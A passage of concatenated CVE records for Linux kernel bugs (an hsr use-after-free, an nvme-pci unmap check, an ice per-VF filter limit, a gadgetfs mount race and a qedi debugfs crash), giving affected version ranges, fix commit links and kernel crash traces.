"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.9"
},
{
"lessThan": "5.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.201",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.139",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.63",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.5.*",
"status": "unaffected",
"version": "6.5.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.7",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.201",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.139",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.63",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.5.12",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.2",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7",
"versionStartIncluding": "5.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nhsr: Prevent use after free in prp_create_tagged_frame()\n\nThe prp_fill_rct() function can fail. In that situation, it frees the\nskb and returns NULL. Meanwhile on the success path, it returns the\noriginal skb. So it\u0027s straight forward to fix bug by using the returned\nvalue."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:44:12.923Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ddf4e04e946aaa6c458b8b6829617cc44af2bffd"
},
{
"url": "https://git.kernel.org/stable/c/a1a485e45d24b1cd8fe834fd6f1b06e2903827da"
},
{
"url": "https://git.kernel.org/stable/c/6086258bd5ea7b5c706ff62da42b8e271b2401db"
},
{
"url": "https://git.kernel.org/stable/c/1787b9f0729d318d67cf7c5a95f0c3dba9a7cc18"
},
{
"url": "https://git.kernel.org/stable/c/d103fb6726904e353b4773188ee3d3acb4078363"
},
{
"url": "https://git.kernel.org/stable/c/876f8ab52363f649bcc74072157dfd7adfbabc0d"
}
],
"title": "hsr: Prevent use after free in prp_create_tagged_frame()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52846",
"datePublished": "2024-05-21T15:31:43.863Z",
"dateReserved": "2024-05-21T15:19:24.254Z",
"dateUpdated": "2025-05-04T07:44:12.923Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42276 (GCVE-0-2024-42276)
Vulnerability from cvelistv5
Published
2024-08-17 09:08
Modified
2025-05-04 09:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nvme-pci: add missing condition check for existence of mapped data
nvme_map_data() is called when request has physical segments, hence
the nvme_unmap_data() should have same condition to avoid dereference.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 4aedb705437f6f98b45f45c394e6803ca67abd33 Version: 4aedb705437f6f98b45f45c394e6803ca67abd33 Version: 4aedb705437f6f98b45f45c394e6803ca67abd33 Version: 4aedb705437f6f98b45f45c394e6803ca67abd33 Version: 4aedb705437f6f98b45f45c394e6803ca67abd33 Version: 4aedb705437f6f98b45f45c394e6803ca67abd33 Version: 4aedb705437f6f98b45f45c394e6803ca67abd33 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42276",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:11:52.374763Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:31.619Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/nvme/host/pci.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3f8ec1d6b0ebd8268307d52be8301973fa5a01ec",
"status": "affected",
"version": "4aedb705437f6f98b45f45c394e6803ca67abd33",
"versionType": "git"
},
{
"lessThan": "be23ae63080e0bf9e246ab20207200bca6585eba",
"status": "affected",
"version": "4aedb705437f6f98b45f45c394e6803ca67abd33",
"versionType": "git"
},
{
"lessThan": "7cc1f4cd90a00b6191cb8cda2d1302fdce59361c",
"status": "affected",
"version": "4aedb705437f6f98b45f45c394e6803ca67abd33",
"versionType": "git"
},
{
"lessThan": "d135c3352f7c947a922da93c8e763ee6bc208b64",
"status": "affected",
"version": "4aedb705437f6f98b45f45c394e6803ca67abd33",
"versionType": "git"
},
{
"lessThan": "77848b379e9f85a08048a2c8b3b4a7e8396f5f83",
"status": "affected",
"version": "4aedb705437f6f98b45f45c394e6803ca67abd33",
"versionType": "git"
},
{
"lessThan": "70100fe721840bf6d8e5abd25b8bffe4d2e049b7",
"status": "affected",
"version": "4aedb705437f6f98b45f45c394e6803ca67abd33",
"versionType": "git"
},
{
"lessThan": "c31fad1470389666ac7169fe43aa65bf5b7e2cfd",
"status": "affected",
"version": "4aedb705437f6f98b45f45c394e6803ca67abd33",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/nvme/host/pci.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.2"
},
{
"lessThan": "5.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "5.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-pci: add missing condition check for existence of mapped data\n\nnvme_map_data() is called when request has physical segments, hence\nthe nvme_unmap_data() should have same condition to avoid dereference."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:25:44.237Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3f8ec1d6b0ebd8268307d52be8301973fa5a01ec"
},
{
"url": "https://git.kernel.org/stable/c/be23ae63080e0bf9e246ab20207200bca6585eba"
},
{
"url": "https://git.kernel.org/stable/c/7cc1f4cd90a00b6191cb8cda2d1302fdce59361c"
},
{
"url": "https://git.kernel.org/stable/c/d135c3352f7c947a922da93c8e763ee6bc208b64"
},
{
"url": "https://git.kernel.org/stable/c/77848b379e9f85a08048a2c8b3b4a7e8396f5f83"
},
{
"url": "https://git.kernel.org/stable/c/70100fe721840bf6d8e5abd25b8bffe4d2e049b7"
},
{
"url": "https://git.kernel.org/stable/c/c31fad1470389666ac7169fe43aa65bf5b7e2cfd"
}
],
"title": "nvme-pci: add missing condition check for existence of mapped data",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42276",
"datePublished": "2024-08-17T09:08:44.694Z",
"dateReserved": "2024-07-30T07:40:12.261Z",
"dateUpdated": "2025-05-04T09:25:44.237Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42291 (GCVE-0-2024-42291)
Vulnerability from cvelistv5
Published
2024-08-17 09:09
Modified
2025-05-04 09:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ice: Add a per-VF limit on number of FDIR filters
While the iavf driver adds a s/w limit (128) on the number of FDIR
filters that the VF can request, a malicious VF driver can request more
than that and exhaust the resources for other VFs.
Add a similar limit in ice.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42291",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:11:03.788403Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:29.655Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/ice/ice_ethtool_fdir.c",
"drivers/net/ethernet/intel/ice/ice_fdir.h",
"drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c",
"drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e81b674ead8e2172b2a69e7b45e079239ace4dbc",
"status": "affected",
"version": "1f7ea1cd6a3748427512ccc9582e18cd9efea966",
"versionType": "git"
},
{
"lessThan": "8e02cd98a6e24389d476e28436d41e620ed8e559",
"status": "affected",
"version": "1f7ea1cd6a3748427512ccc9582e18cd9efea966",
"versionType": "git"
},
{
"lessThan": "d62389073a5b937413e2d1bc1da06ccff5103c0c",
"status": "affected",
"version": "1f7ea1cd6a3748427512ccc9582e18cd9efea966",
"versionType": "git"
},
{
"lessThan": "292081c4e7f575a79017d5cbe1a0ec042783976f",
"status": "affected",
"version": "1f7ea1cd6a3748427512ccc9582e18cd9efea966",
"versionType": "git"
},
{
"lessThan": "6ebbe97a488179f5dc85f2f1e0c89b486e99ee97",
"status": "affected",
"version": "1f7ea1cd6a3748427512ccc9582e18cd9efea966",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/ice/ice_ethtool_fdir.c",
"drivers/net/ethernet/intel/ice/ice_fdir.h",
"drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c",
"drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.13"
},
{
"lessThan": "5.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.172",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.172",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "5.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: Add a per-VF limit on number of FDIR filters\n\nWhile the iavf driver adds a s/w limit (128) on the number of FDIR\nfilters that the VF can request, a malicious VF driver can request more\nthan that and exhaust the resources for other VFs.\n\nAdd a similar limit in ice."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:26:06.129Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e81b674ead8e2172b2a69e7b45e079239ace4dbc"
},
{
"url": "https://git.kernel.org/stable/c/8e02cd98a6e24389d476e28436d41e620ed8e559"
},
{
"url": "https://git.kernel.org/stable/c/d62389073a5b937413e2d1bc1da06ccff5103c0c"
},
{
"url": "https://git.kernel.org/stable/c/292081c4e7f575a79017d5cbe1a0ec042783976f"
},
{
"url": "https://git.kernel.org/stable/c/6ebbe97a488179f5dc85f2f1e0c89b486e99ee97"
}
],
"title": "ice: Add a per-VF limit on number of FDIR filters",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42291",
"datePublished": "2024-08-17T09:09:00.944Z",
"dateReserved": "2024-07-30T07:40:12.268Z",
"dateUpdated": "2025-05-04T09:26:06.129Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48869 (GCVE-0-2022-48869)
Vulnerability from cvelistv5
Published
2024-08-21 06:09
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
USB: gadgetfs: Fix race between mounting and unmounting
The syzbot fuzzer and Gerald Lee have identified a use-after-free bug
in the gadgetfs driver, involving processes concurrently mounting and
unmounting the gadgetfs filesystem. In particular, gadgetfs_fill_super()
can race with gadgetfs_kill_sb(), causing the latter to deallocate
the_device while the former is using it. The output from KASAN says,
in part:
BUG: KASAN: use-after-free in instrument_atomic_read_write include/linux/instrumented.h:102 [inline]
BUG: KASAN: use-after-free in atomic_fetch_sub_release include/linux/atomic/atomic-instrumented.h:176 [inline]
BUG: KASAN: use-after-free in __refcount_sub_and_test include/linux/refcount.h:272 [inline]
BUG: KASAN: use-after-free in __refcount_dec_and_test include/linux/refcount.h:315 [inline]
BUG: KASAN: use-after-free in refcount_dec_and_test include/linux/refcount.h:333 [inline]
BUG: KASAN: use-after-free in put_dev drivers/usb/gadget/legacy/inode.c:159 [inline]
BUG: KASAN: use-after-free in gadgetfs_kill_sb+0x33/0x100 drivers/usb/gadget/legacy/inode.c:2086
Write of size 4 at addr ffff8880276d7840 by task syz-executor126/18689
CPU: 0 PID: 18689 Comm: syz-executor126 Not tainted 6.1.0-syzkaller #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/26/2022
Call Trace:
<TASK>
...
atomic_fetch_sub_release include/linux/atomic/atomic-instrumented.h:176 [inline]
__refcount_sub_and_test include/linux/refcount.h:272 [inline]
__refcount_dec_and_test include/linux/refcount.h:315 [inline]
refcount_dec_and_test include/linux/refcount.h:333 [inline]
put_dev drivers/usb/gadget/legacy/inode.c:159 [inline]
gadgetfs_kill_sb+0x33/0x100 drivers/usb/gadget/legacy/inode.c:2086
deactivate_locked_super+0xa7/0xf0 fs/super.c:332
vfs_get_super fs/super.c:1190 [inline]
get_tree_single+0xd0/0x160 fs/super.c:1207
vfs_get_tree+0x88/0x270 fs/super.c:1531
vfs_fsconfig_locked fs/fsopen.c:232 [inline]
The simplest solution is to ensure that gadgetfs_fill_super() and
gadgetfs_kill_sb() are serialized by making them both acquire a new
mutex.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48869",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:05:35.321755Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:54.495Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/gadget/legacy/inode.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9a39f4626b361ee7aa10fd990401c37ec3b466ae",
"status": "affected",
"version": "e5d82a7360d124ae1a38c2a5eac92ba49b125191",
"versionType": "git"
},
{
"lessThan": "856e4b5e53f21edbd15d275dde62228dd94fb2b4",
"status": "affected",
"version": "e5d82a7360d124ae1a38c2a5eac92ba49b125191",
"versionType": "git"
},
{
"lessThan": "a2e075f40122d8daf587db126c562a67abd69cf9",
"status": "affected",
"version": "e5d82a7360d124ae1a38c2a5eac92ba49b125191",
"versionType": "git"
},
{
"lessThan": "616fd34d017000ecf9097368b13d8a266f4920b3",
"status": "affected",
"version": "e5d82a7360d124ae1a38c2a5eac92ba49b125191",
"versionType": "git"
},
{
"lessThan": "d18dcfe9860e842f394e37ba01ca9440ab2178f4",
"status": "affected",
"version": "e5d82a7360d124ae1a38c2a5eac92ba49b125191",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/gadget/legacy/inode.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.3"
},
{
"lessThan": "5.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.230",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.230",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.165",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.90",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.8",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "5.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nUSB: gadgetfs: Fix race between mounting and unmounting\n\nThe syzbot fuzzer and Gerald Lee have identified a use-after-free bug\nin the gadgetfs driver, involving processes concurrently mounting and\nunmounting the gadgetfs filesystem. In particular, gadgetfs_fill_super()\ncan race with gadgetfs_kill_sb(), causing the latter to deallocate\nthe_device while the former is using it. The output from KASAN says,\nin part:\n\nBUG: KASAN: use-after-free in instrument_atomic_read_write include/linux/instrumented.h:102 [inline]\nBUG: KASAN: use-after-free in atomic_fetch_sub_release include/linux/atomic/atomic-instrumented.h:176 [inline]\nBUG: KASAN: use-after-free in __refcount_sub_and_test include/linux/refcount.h:272 [inline]\nBUG: KASAN: use-after-free in __refcount_dec_and_test include/linux/refcount.h:315 [inline]\nBUG: KASAN: use-after-free in refcount_dec_and_test include/linux/refcount.h:333 [inline]\nBUG: KASAN: use-after-free in put_dev drivers/usb/gadget/legacy/inode.c:159 [inline]\nBUG: KASAN: use-after-free in gadgetfs_kill_sb+0x33/0x100 drivers/usb/gadget/legacy/inode.c:2086\nWrite of size 4 at addr ffff8880276d7840 by task syz-executor126/18689\n\nCPU: 0 PID: 18689 Comm: syz-executor126 Not tainted 6.1.0-syzkaller #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/26/2022\nCall Trace:\n \u003cTASK\u003e\n...\n atomic_fetch_sub_release include/linux/atomic/atomic-instrumented.h:176 [inline]\n __refcount_sub_and_test include/linux/refcount.h:272 [inline]\n __refcount_dec_and_test include/linux/refcount.h:315 [inline]\n refcount_dec_and_test include/linux/refcount.h:333 [inline]\n put_dev drivers/usb/gadget/legacy/inode.c:159 [inline]\n gadgetfs_kill_sb+0x33/0x100 drivers/usb/gadget/legacy/inode.c:2086\n deactivate_locked_super+0xa7/0xf0 fs/super.c:332\n vfs_get_super fs/super.c:1190 [inline]\n get_tree_single+0xd0/0x160 fs/super.c:1207\n vfs_get_tree+0x88/0x270 fs/super.c:1531\n vfs_fsconfig_locked fs/fsopen.c:232 [inline]\n\nThe simplest solution is to ensure that gadgetfs_fill_super() and\ngadgetfs_kill_sb() are serialized by making them both acquire a new\nmutex."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:09.576Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9a39f4626b361ee7aa10fd990401c37ec3b466ae"
},
{
"url": "https://git.kernel.org/stable/c/856e4b5e53f21edbd15d275dde62228dd94fb2b4"
},
{
"url": "https://git.kernel.org/stable/c/a2e075f40122d8daf587db126c562a67abd69cf9"
},
{
"url": "https://git.kernel.org/stable/c/616fd34d017000ecf9097368b13d8a266f4920b3"
},
{
"url": "https://git.kernel.org/stable/c/d18dcfe9860e842f394e37ba01ca9440ab2178f4"
}
],
"title": "USB: gadgetfs: Fix race between mounting and unmounting",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48869",
"datePublished": "2024-08-21T06:09:59.526Z",
"dateReserved": "2024-07-16T11:38:08.921Z",
"dateUpdated": "2025-05-04T08:25:09.576Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-40978 (GCVE-0-2024-40978)
Vulnerability from cvelistv5
Published
2024-07-12 12:32
Modified
2025-05-04 09:19
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: qedi: Fix crash while reading debugfs attribute
The qedi_dbg_do_not_recover_cmd_read() function invokes sprintf() directly
on a __user pointer, which results into the crash.
To fix this issue, use a small local stack buffer for sprintf() and then
call simple_read_from_buffer(), which in turns make the copy_to_user()
call.
BUG: unable to handle page fault for address: 00007f4801111000
PGD 8000000864df6067 P4D 8000000864df6067 PUD 864df7067 PMD 846028067 PTE 0
Oops: 0002 [#1] PREEMPT SMP PTI
Hardware name: HPE ProLiant DL380 Gen10/ProLiant DL380 Gen10, BIOS U30 06/15/2023
RIP: 0010:memcpy_orig+0xcd/0x130
RSP: 0018:ffffb7a18c3ffc40 EFLAGS: 00010202
RAX: 00007f4801111000 RBX: 00007f4801111000 RCX: 000000000000000f
RDX: 000000000000000f RSI: ffffffffc0bfd7a0 RDI: 00007f4801111000
RBP: ffffffffc0bfd7a0 R08: 725f746f6e5f6f64 R09: 3d7265766f636572
R10: ffffb7a18c3ffd08 R11: 0000000000000000 R12: 00007f4881110fff
R13: 000000007fffffff R14: ffffb7a18c3ffca0 R15: ffffffffc0bfd7af
FS: 00007f480118a740(0000) GS:ffff98e38af00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f4801111000 CR3: 0000000864b8e001 CR4: 00000000007706e0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
PKRU: 55555554
Call Trace:
<TASK>
? __die_body+0x1a/0x60
? page_fault_oops+0x183/0x510
? exc_page_fault+0x69/0x150
? asm_exc_page_fault+0x22/0x30
? memcpy_orig+0xcd/0x130
vsnprintf+0x102/0x4c0
sprintf+0x51/0x80
qedi_dbg_do_not_recover_cmd_read+0x2f/0x50 [qedi 6bcfdeeecdea037da47069eca2ba717c84a77324]
full_proxy_read+0x50/0x80
vfs_read+0xa5/0x2e0
? folio_add_new_anon_rmap+0x44/0xa0
? set_pte_at+0x15/0x30
? do_pte_missing+0x426/0x7f0
ksys_read+0xa5/0xe0
do_syscall_64+0x58/0x80
? __count_memcg_events+0x46/0x90
? count_memcg_event_mm+0x3d/0x60
? handle_mm_fault+0x196/0x2f0
? do_user_addr_fault+0x267/0x890
? exc_page_fault+0x69/0x150
entry_SYSCALL_64_after_hwframe+0x72/0xdc
RIP: 0033:0x7f4800f20b4d
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
